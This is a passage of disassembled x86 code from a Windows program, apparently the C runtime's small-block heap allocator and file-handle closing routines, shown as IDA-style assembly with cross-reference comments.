mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41A37C: ; CODE XREF: sub_41A20A+112�j
mov esi, [ebp+arg_4]
jmp short loc_41A384
; ---------------------------------------------------------------------------
loc_41A381: ; CODE XREF: sub_41A20A+E2�j
mov ebx, [ebp+arg_0]
loc_41A384: ; CODE XREF: sub_41A20A+175�j
cmp [ebp+var_C], 0
jnz short loc_41A392
cmp ebx, edx
jz loc_41A412
loc_41A392: ; CODE XREF: sub_41A20A+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_41A412
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_41A3E9
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A3D8
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41A3D8: ; CODE XREF: sub_41A20A+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_41A412
; ---------------------------------------------------------------------------
loc_41A3E9: ; CODE XREF: sub_41A20A+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A3FF
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41A3FF: ; CODE XREF: sub_41A20A+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_41A412: ; CODE XREF: sub_41A20A+182�j
; sub_41A20A+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41A51D
mov eax, dword_482944
test eax, eax
jz loc_41A50F
mov ecx, dword_48295C
mov esi, dword_422190
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_48295C
mov eax, dword_482944
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_482944
mov eax, [eax+10h]
mov ecx, dword_48295C
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_482944
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_482944
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_41A4A0
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_482944
loc_41A4A0: ; CODE XREF: sub_41A20A+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41A50F
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_482944
push dword ptr [eax+10h]
push 0
push dword_482960
call dword_422058 ; RtlFreeHeap
mov eax, dword_482948
mov edx, dword_48294C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_482944
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41EFF0
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_482948
cmp eax, dword_482944
jbe short loc_41A505
sub [ebp+arg_0], 14h
loc_41A505: ; CODE XREF: sub_41A20A+2F5�j
mov eax, dword_48294C
mov dword_482954, eax
loc_41A50F: ; CODE XREF: sub_41A20A+223�j
; sub_41A20A+29A�j
mov eax, [ebp+arg_0]
mov dword_482944, eax
mov dword_48295C, edi
loc_41A51D: ; CODE XREF: sub_41A20A+216�j
pop ebx
loc_41A51E: ; CODE XREF: sub_41A20A+37�j
pop edi
pop esi
leave
retn
sub_41A20A endp
; =============== S U B R O U T I N E =======================================
sub_41A522 proc near ; CODE XREF: sub_41A9BE+150�p
mov eax, dword_482948
mov ecx, dword_482958
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41A568
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_48294C
push edi
push dword_482960
call dword_42215C ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_41A557
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_41A557: ; CODE XREF: sub_41A522+2F�j
add dword_482958, 10h
mov dword_48294C, eax
mov eax, dword_482948
loc_41A568: ; CODE XREF: sub_41A522+10�j
mov ecx, dword_48294C
push esi
push 41C4h
push 8
push dword_482960
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call dword_42205C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_41A593
loc_41A58F: ; CODE XREF: sub_41A522+9B�j
xor eax, eax
jmp short loc_41A5D6
; ---------------------------------------------------------------------------
loc_41A593: ; CODE XREF: sub_41A522+6B�j
push 4
push 2000h
push 100000h
push edi
call dword_422194 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41A5BF
push dword ptr [esi+10h]
push edi
push dword_482960
call dword_422058 ; RtlFreeHeap
jmp short loc_41A58F
; ---------------------------------------------------------------------------
loc_41A5BF: ; CODE XREF: sub_41A522+89�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_482948
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41A5D6: ; CODE XREF: sub_41A522+6F�j
pop esi
pop edi
retn
sub_41A522 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5D9 proc near ; CODE XREF: sub_41A9BE+15F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_41A5F1
; ---------------------------------------------------------------------------
loc_41A5EE: ; CODE XREF: sub_41A5D9+1A�j
shl eax, 1
inc ebx
loc_41A5F1: ; CODE XREF: sub_41A5D9+13�j
test eax, eax
jge short loc_41A5EE
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_41A60A: ; CODE XREF: sub_41A5D9+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41A60A
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call dword_422194 ; VirtualAlloc
test eax, eax
jnz short loc_41A63D
or eax, 0FFFFFFFFh
jmp loc_41A6DA
; ---------------------------------------------------------------------------
loc_41A63D: ; CODE XREF: sub_41A5D9+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_41A68D
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_41A655: ; CODE XREF: sub_41A5D9+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_41A655
mov edx, [ebp+var_4]
loc_41A68D: ; CODE XREF: sub_41A5D9+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41A6CA
or [eax+4], edi
loc_41A6CA: ; CODE XREF: sub_41A5D9+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41A6DA: ; CODE XREF: sub_41A5D9+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A5D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6DF proc near ; CODE XREF: sub_416F93+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_41A881
test bl, 1
jnz loc_41A87A
add ebx, ecx
cmp esi, ebx
jg loc_41A87A
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41A754
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41A754: ; CODE XREF: sub_41A6DF+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41A79F
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_41A780
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41A79F
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A79F
; ---------------------------------------------------------------------------
loc_41A780: ; CODE XREF: sub_41A6DF+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A79F
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A79F: ; CODE XREF: sub_41A6DF+7B�j
; sub_41A6DF+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41A868
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_41A7D9
push 3Fh
pop edi
loc_41A7D9: ; CODE XREF: sub_41A6DF+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41A856
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_41A82D
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41A825
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41A825: ; CODE XREF: sub_41A6DF+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_41A84D
; ---------------------------------------------------------------------------
loc_41A82D: ; CODE XREF: sub_41A6DF+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41A843
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41A843: ; CODE XREF: sub_41A6DF+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_41A84D: ; CODE XREF: sub_41A6DF+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41A856: ; CODE XREF: sub_41A6DF+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41A86B
; ---------------------------------------------------------------------------
loc_41A868: ; CODE XREF: sub_41A6DF+DE�j
mov edx, [ebp+arg_4]
loc_41A86B: ; CODE XREF: sub_41A6DF+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41A9B6
; ---------------------------------------------------------------------------
loc_41A87A: ; CODE XREF: sub_41A6DF+50�j
; sub_41A6DF+5A�j
xor eax, eax
jmp loc_41A9B9
; ---------------------------------------------------------------------------
loc_41A881: ; CODE XREF: sub_41A6DF+47�j
jge loc_41A9B6
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_41A8AC
push 3Fh
pop esi
loc_41A8AC: ; CODE XREF: sub_41A6DF+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_41A936
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41A8C5
push 3Fh
pop esi
loc_41A8C5: ; CODE XREF: sub_41A6DF+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41A90F
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_41A8F0
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41A90C
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41A90C
; ---------------------------------------------------------------------------
loc_41A8F0: ; CODE XREF: sub_41A6DF+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41A90C
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41A90C: ; CODE XREF: sub_41A6DF+208�j
; sub_41A6DF+20F�j ...
mov ebx, [ebp+arg_4]
loc_41A90F: ; CODE XREF: sub_41A6DF+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41A936
push 3Fh
pop esi
loc_41A936: ; CODE XREF: sub_41A6DF+1D1�j
; sub_41A6DF+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41A9AD
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_41A984
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A97C
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41A97C: ; CODE XREF: sub_41A6DF+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_41A9A4
; ---------------------------------------------------------------------------
loc_41A984: ; CODE XREF: sub_41A6DF+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41A99A
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41A99A: ; CODE XREF: sub_41A6DF+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_41A9A4: ; CODE XREF: sub_41A6DF+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41A9AD: ; CODE XREF: sub_41A6DF+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41A9B6: ; CODE XREF: sub_41A6DF+196�j
; sub_41A6DF:loc_41A881�j
xor eax, eax
inc eax
loc_41A9B9: ; CODE XREF: sub_41A6DF+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A6DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9BE proc near ; CODE XREF: sub_416D08+2D�p
; sub_416F93+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_482948
mov edx, dword_48294C
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_41A9FB
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_41AA08
; ---------------------------------------------------------------------------
loc_41A9FB: ; CODE XREF: sub_41A9BE+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_41AA08: ; CODE XREF: sub_41A9BE+3B�j
mov eax, dword_482954
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_41AA2A
; ---------------------------------------------------------------------------
loc_41AA16: ; CODE XREF: sub_41A9BE+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41AA2F
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_41AA2A: ; CODE XREF: sub_41A9BE+56�j
mov [ebp+arg_0], ebx
jb short loc_41AA16
loc_41AA2F: ; CODE XREF: sub_41A9BE+64�j
cmp ebx, [ebp+var_4]
jnz short loc_41AA58
mov ebx, edx
jmp short loc_41AA49
; ---------------------------------------------------------------------------
loc_41AA38: ; CODE XREF: sub_41A9BE+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41AA50
add ebx, 14h
loc_41AA49: ; CODE XREF: sub_41A9BE+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41AA38
loc_41AA50: ; CODE XREF: sub_41A9BE+86�j
cmp ebx, eax
jz loc_41AAEC
loc_41AA58: ; CODE XREF: sub_41A9BE+74�j
; sub_41A9BE+170�j
mov dword_482954, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41AA7F
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41AAB5
loc_41AA7F: ; CODE XREF: sub_41A9BE+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41AAB2
loc_41AA9B: ; CODE XREF: sub_41A9BE+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_41AA9B
loc_41AAB2: ; CODE XREF: sub_41A9BE+DB�j
mov edx, [ebp+var_4]
loc_41AAB5: ; CODE XREF: sub_41A9BE+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_41AB3E
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_41AB3E
; ---------------------------------------------------------------------------
loc_41AAE0: ; CODE XREF: sub_41A9BE+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_41AAF1
add ebx, 14h
mov [ebp+arg_0], ebx
loc_41AAEC: ; CODE XREF: sub_41A9BE+94�j
cmp ebx, [ebp+var_4]
jb short loc_41AAE0
loc_41AAF1: ; CODE XREF: sub_41A9BE+126�j
cmp ebx, [ebp+var_4]
jnz short loc_41AB1C
mov ebx, edx
jmp short loc_41AB03
; ---------------------------------------------------------------------------
loc_41AAFA: ; CODE XREF: sub_41A9BE+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_41AB0A
add ebx, 14h
loc_41AB03: ; CODE XREF: sub_41A9BE+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41AAFA
loc_41AB0A: ; CODE XREF: sub_41A9BE+140�j
cmp ebx, eax
jnz short loc_41AB1C
call sub_41A522
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_41AB34
loc_41AB1C: ; CODE XREF: sub_41A9BE+136�j
; sub_41A9BE+14E�j
push ebx
call sub_41A5D9
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_41AA58
loc_41AB34: ; CODE XREF: sub_41A9BE+15C�j
xor eax, eax
jmp loc_41ACB5
; ---------------------------------------------------------------------------
loc_41AB3B: ; CODE XREF: sub_41A9BE+182�j
shl ecx, 1
inc edi
loc_41AB3E: ; CODE XREF: sub_41A9BE+111�j
; sub_41A9BE+120�j
test ecx, ecx
jge short loc_41AB3B
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_41AB5F
push 3Fh
pop esi
loc_41AB5F: ; CODE XREF: sub_41A9BE+19C�j
cmp esi, edi
jz loc_41AC68
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41ABCB
cmp edi, 20h
mov ebx, 80000000h
jge short loc_41AB9F
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41ABC8
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_41ABCB
; ---------------------------------------------------------------------------
loc_41AB9F: ; CODE XREF: sub_41A9BE+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41ABC8
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41ABCB
; ---------------------------------------------------------------------------
loc_41ABC8: ; CODE XREF: sub_41A9BE+1D5�j
; sub_41A9BE+1FD�j
mov ebx, [ebp+arg_0]
loc_41ABCB: ; CODE XREF: sub_41A9BE+1AF�j
; sub_41A9BE+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41AC74
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41AC65
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_41AC3C
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41AC2A
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41AC2A: ; CODE XREF: sub_41A9BE+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41AC65
; ---------------------------------------------------------------------------
loc_41AC3C: ; CODE XREF: sub_41A9BE+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41AC4F
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41AC4F: ; CODE XREF: sub_41A9BE+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41AC65: ; CODE XREF: sub_41A9BE+247�j
; sub_41A9BE+27C�j
mov ecx, [ebp+var_8]
loc_41AC68: ; CODE XREF: sub_41A9BE+1A3�j
test ecx, ecx
jz short loc_41AC77
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41AC77
; ---------------------------------------------------------------------------
loc_41AC74: ; CODE XREF: sub_41A9BE+223�j
mov ecx, [ebp+var_8]
loc_41AC77: ; CODE XREF: sub_41A9BE+2AC�j
; sub_41A9BE+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41ACAD
cmp ebx, dword_482944
jnz short loc_41ACAD
mov ecx, [ebp+var_4]
cmp ecx, dword_48295C
jnz short loc_41ACAD
and dword_482944, 0
loc_41ACAD: ; CODE XREF: sub_41A9BE+2D3�j
; sub_41A9BE+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41ACB5: ; CODE XREF: sub_41A9BE+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A9BE endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41AD08 proc near ; CODE XREF: sub_416D83+1F�p
; sub_416F93+150�p ...
arg_0 = dword ptr 4
mov eax, dword_481310
test eax, eax
jz short loc_41AD20
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41AD20
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AD20: ; CODE XREF: sub_41AD08+7�j
; sub_41AD08+12�j
xor eax, eax
retn
sub_41AD08 endp
; =============== S U B R O U T I N E =======================================
sub_41AD23 proc near ; CODE XREF: sub_41ADA6+4C�p
; sub_41F885+2DC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_41F50B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41AD71
cmp esi, 1
jz short loc_41AD3F
cmp esi, 2
jnz short loc_41AD55
loc_41AD3F: ; CODE XREF: sub_41AD23+15�j
push 2
call sub_41F50B
push 1
mov edi, eax
call sub_41F50B
cmp eax, edi
pop ecx
pop ecx
jz short loc_41AD71
loc_41AD55: ; CODE XREF: sub_41AD23+1A�j
push esi
call sub_41F50B
pop ecx
push eax
call dword_42202C ; CloseHandle
test eax, eax
jnz short loc_41AD71
call dword_422004 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_41AD73
; ---------------------------------------------------------------------------
loc_41AD71: ; CODE XREF: sub_41AD23+10�j
; sub_41AD23+30�j ...
xor edi, edi
loc_41AD73: ; CODE XREF: sub_41AD23+4C�j
push esi
call sub_41F48C
mov eax, esi
sar eax, 5
mov eax, dword_4815E0[eax*4]
and esi, 1Fh
pop ecx
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_41ADA1
push edi
call sub_41B947
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_41ADA3
; ---------------------------------------------------------------------------
loc_41ADA1: ; CODE XREF: sub_41AD23+70�j
xor eax, eax
loc_41ADA3: ; CODE XREF: sub_41AD23+7C�j
pop edi
pop esi
retn
sub_41AD23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ADA6 proc near ; CODE XREF: sub_416DC1+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041AE25 SIZE 0000001C BYTES
push 0Ch
push offset stru_42C0B8
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_4815D0
jnb short loc_41AE25
mov eax, ebx
sar eax, 5
lea edi, ds:4815E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41AE25
push ebx
call sub_41F54C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41ADFD
push ebx
